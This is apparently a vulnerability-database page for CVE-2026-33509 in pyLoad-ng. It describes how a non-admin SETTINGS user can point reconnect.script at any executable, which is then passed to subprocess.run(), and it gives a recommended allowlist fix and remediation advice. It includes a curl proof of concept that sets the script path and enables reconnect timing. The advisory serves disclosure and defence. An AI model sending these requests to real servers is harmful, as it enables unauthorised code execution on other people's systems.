Python
CVE-2026-33509
HIGH
Severity by source
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder - all other security-critical settings including reconnect.script are writable without any allowlist or path restriction.
Details
The vulnerability chain spans two components:
1. Unrestricted config write - src/pyload/core/api/__init__.py:210-243
@permission(Perms.SETTINGS)
@post
def set_config_value(self, category: str, option: str, value: Any, section: str = "core") -> None:
self.pyload.addon_manager.dispatch_event(
"config_changed", category, option, value, section
)
if section == "core":
if category == "general" and option == "storage_folder":
# Forbid setting the download folder inside dangerous locations
# ... validation only for storage_folder ...
return
self.pyload.config.set(category, option, value)
# No validation for any other optionThe Perms.SETTINGS permission (value 128) is a non-admin permission flag. The only hardcoded validation is for general.storage_folder. The reconnect.script option is written directly to config with no path validation, allowlist, or sanitization.
2. Arbitrary script execution - src/pyload/core/managers/thread_manager.py:157-199
def try_reconnect(self):
if not (
self.pyload.config.get("reconnect", "enabled")
and self.pyload.api.is_time_reconnect()
):
return False
# ... checks if active downloads want reconnect ...
reconnect_script = self.pyload.config.get("reconnect", "script")
if not os.path.isfile(reconnect_script):
self.pyload.config.set("reconnect", "enabled", False)
self.pyload.log.warning(self._("Reconnect script not found!"))
return
# ... reconnect logic ...
try:
subprocess.run(reconnect_script)
# Executes attacker-controlled path
except Exception:
# ...The reconnect_script value comes directly from config. The only check is os.path.isfile() - the file must exist but there is no allowlist, no path restriction, and no signature verification.
3. Attacker also controls timing via same SETTINGS permission
The attacker can set reconnect.enabled=True, reconnect.start_time, and reconnect.end_time through the same set_config_value() endpoint to control when execution occurs. toggle_reconnect() at line 321 requires only Perms.STATUS - an even lower privilege.
4. Additional privilege escalation via config access
Beyond RCE, the same unrestricted config write allows SETTINGS users to:
- Read proxy credentials (
proxy.username/proxy.password) in plaintext viaget_config() - Redirect syslog to an attacker-controlled server (
log.syslog_host/log.syslog_port) - Disable SSL (
webui.use_ssl=False), rebind to0.0.0.0(webui.host) - Modify SSL certificate/key paths to enable MITM
PoC
Step 1: Set reconnect script to an attacker-controlled executable
Via API:
# Authenticate and get session (as user with SETTINGS permission)
curl -c cookies.txt -X POST 'http://target:8000/api/login' \
-d 'username=settingsuser&password=pass123'
# Set reconnect script to a known executable on the system
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core'Via Web UI:
curl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \
-d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'Step 2: Enable reconnect and set timing window
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=enabled&value=True§ion=core'
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=start_time&value=00:00§ion=core'
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=end_time&value=23:59§ion=core'Step 3: Script executes when thread manager calls try_reconnect()
The thread manager's run() method (called repeatedly by the core loop) invokes try_reconnect(), which calls subprocess.run(reconnect_script) at thread_manager.py:199.
Note on exploitation constraints: The file at the target path must exist (os.path.isfile() check) and be executable. With shell=False (subprocess.run default), no arguments are passed. If the attacker also has ADD permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.
Impact
- Remote Code Execution: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user
- Privilege escalation: The SETTINGS permission is described as "can access settings" - granting it is not expected to grant arbitrary code execution capability
- Credential exposure: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via
get_config() - Network reconfiguration: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings
Recommended Fix
Add an allowlist or category-level restriction in set_config_value() that prevents non-admin users from modifying security-critical options:
# In set_config_value(), after the storage_folder check:
ADMIN_ONLY_OPTIONS = {
("reconnect", "script"),
("webui", "host"),
("webui", "use_ssl"),
("webui", "ssl_cert"),
("webui", "ssl_key"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "username"),
("proxy", "password"),
}
if section == "core" and (category, option) in ADMIN_ONLY_OPTIONS:
# Require ADMIN role for security-critical settings
if not self.pyload.api.user_data.get("role") == Role.ADMIN:
raise PermissionError(f"Admin role required to modify {category}.{option}")Additionally, consider validating the reconnect.script path against an allowlist of directories or requiring admin approval for script path changes.
AnalysisAI
Remote code execution in Python allows authenticated users with SETTINGS permission to modify the reconnect.script configuration parameter without restriction, which is then passed unsanitized to subprocess.run() enabling arbitrary command execution. The vulnerability exists due to insufficient input validation in the set_config_value() API endpoint, which only restricts the general.storage_folder setting while leaving other security-critical options like reconnect.script unprotected. An attacker with non-admin SETTINGS privileges can exploit this to achieve full system compromise on the affected Python installation.
Technical ContextAI
This vulnerability affects pyLoad-ng (CPE: pkg:pip/pyload-ng), a Python-based download manager. The root cause is CWE-269 (Improper Privilege Management), where the set_config_value() function in src/pyload/core/api/__init__.py only validates the general.storage_folder setting but permits users with SETTINGS permission (a non-admin role) to modify any other configuration option including reconnect.script. The thread manager's try_reconnect() function then passes this user-controlled path directly to subprocess.run() with only an os.path.isfile() existence check. This represents a classic configuration injection attack where insufficient authorization checking on sensitive parameters leads to command execution. The vulnerability also enables reading sensitive configuration values like proxy credentials and modifying network security settings such as SSL configuration and syslog destinations.
RemediationAI
Apply the security patch available in commit f5e284fcdfeaf08436bb03e5fcf697aaac659d8b from the pyLoad GitHub repository at https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b. Review and restrict the SETTINGS permission to only trusted administrative users, as this permission level should not be granted broadly. Implement the recommended allowlist for ADMIN_ONLY_OPTIONS as described in the advisory to prevent non-admin users from modifying security-critical configuration parameters including reconnect.script, webui.host, SSL settings, and logging destinations. As an interim mitigation, disable the reconnect feature or ensure the reconnect.script configuration points to a validated, read-only path. Audit existing configuration changes made by users with SETTINGS permission to identify potential compromise.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-269 – Improper Privilege Management
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-r7mc-x6x7-cqxx